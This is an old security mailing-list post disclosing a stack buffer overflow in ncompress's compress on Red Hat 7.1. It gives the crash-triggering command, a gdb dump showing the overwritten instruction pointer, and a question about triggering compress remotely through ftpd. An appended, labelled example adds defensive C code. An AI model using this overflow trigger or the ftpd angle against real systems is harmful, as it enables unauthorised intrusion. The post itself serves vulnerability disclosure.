compress(vul) + ftpd(?)

From: HypH (hyphenat_private)
Date: Tue Mar 05 2002 - 05:43:06 PST


    [hyph@port ~]$ rpm -qf `which compress`
    ncompress-4.2.4-21
    [hyph@port ~]$ compress `perl -e 'print "A" x 1100'`
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File
     name too long
    Segmentation fault  (core dumped)
    [hyph@port ~]$gdb compress core
    [...]
    #0  0x41414141 in ?? ()
    (gdb) i r
    eax            0x461    1121
    ecx            0x1      1
    edx            0x40158be0       1075153888
    ebx            0x41414141       1094795585
    esp            0xbffff368       0xbffff368
    ebp            0x41414141       0x41414141
    esi            0x41414141       1094795585
    edi            0x41414141       1094795585
    eip            0x41414141       0x41414141 <--- :-))
    [...]
    [hyph@port ~]$ cat /etc/redhat-release
    Red Hat Linux release 7.1 (Seawolf)
    [hyph@port ~]$ ls -l `which compress`
    -rwxr-xr-x    2 root     root        16156 gru 12  2000 /usr/bin/compress
    
    Compress isn't suid so it gives us no benefit. And here's my question:
    Is there any way to force the ftpd to 'compress' a file before sending it, 
    from the client's side? I'm asking for this particular daemon because of
    this: 
    
    [hyph@port ~]$ ls -l /var/ftp/bin/ 
    razem 400k
    -r--------    1 root     root          313 sie  2  2001 bin.md5
    -rwxr-xr-x    2 root     root          16k gru 12  2000 compress <-- :-))
    -rw-------    1 root     root         848k mar  3 10:07 core
    -rwxr-xr-x    2 root     root          48k sie  8  2000 cpio
    -rwxr-xr-x    4 root     root          49k lut  8  2001 gzip
    -rwxrwx--x    2 root     root          45k mar 14  2001 ls
    -rwxr-xr-x    2 root     root         147k mar  6  2001 tar
    
    The benefits would be obvious.
    
    Sorry if it's a known bug/vulnerability (but I've never heard 'bout it before)
    
    -- 
    
    :::::::::::::::::::::::::::
    Linux isn't unfriendly 
    he's only picky in choosing 
    his friends.
    his friends.
    :::::::::::::::::::::::::::
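
Added example, not part of the original post and not ncompress source code: registers and eip filled with 0x41 after a 1100-byte filename argument indicate that argument data was written past a fixed-size stack buffer. The sketch below shows the bounded alternative for building an output name from a command-line argument; `NAME_BUF`, `build_output_name` and the `.Z` suffix handling are assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 1024   /* assumed size of the fixed filename buffer */

/* Unsafe pattern, illustrative only (not taken from ncompress, never called):
 *     char ofname[NAME_BUF];
 *     strcpy(ofname, arg);      // no length check on argv data
 *     strcat(ofname, ".Z");
 * An argument longer than the buffer overwrites adjacent stack data,
 * including saved registers and the return address.
 */

/* Hardened form: build "<arg>.Z" in out[outsz], or fail without writing
 * past the buffer. Returns 0, or EINVAL / ENAMETOOLONG on error. */
int build_output_name(const char *arg, char *out, size_t outsz)
{
    static const char suffix[] = ".Z";
    size_t len, need;

    if (arg == NULL || out == NULL || outsz == 0)
        return EINVAL;

    len = strlen(arg);
    need = len + sizeof(suffix);          /* sizeof counts the trailing NUL */
    if (need > outsz) {
        out[0] = '\0';                    /* leave a valid empty string */
        return ENAMETOOLONG;
    }
    memcpy(out, arg, len);
    memcpy(out + len, suffix, sizeof(suffix));
    return 0;
}

int main(void)
{
    char big[1101], out[NAME_BUF];
    memset(big, 'A', 1100);               /* constructed input, length as in the post */
    big[1100] = '\0';
    printf("1100-byte name -> %s\n",
           build_output_name(big, out, sizeof out) == ENAMETOOLONG ? "rejected" : "accepted");
    printf("short name     -> %d (%s)\n",
           build_output_name("data.txt", out, sizeof out), out);
    return 0;
}
```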
    


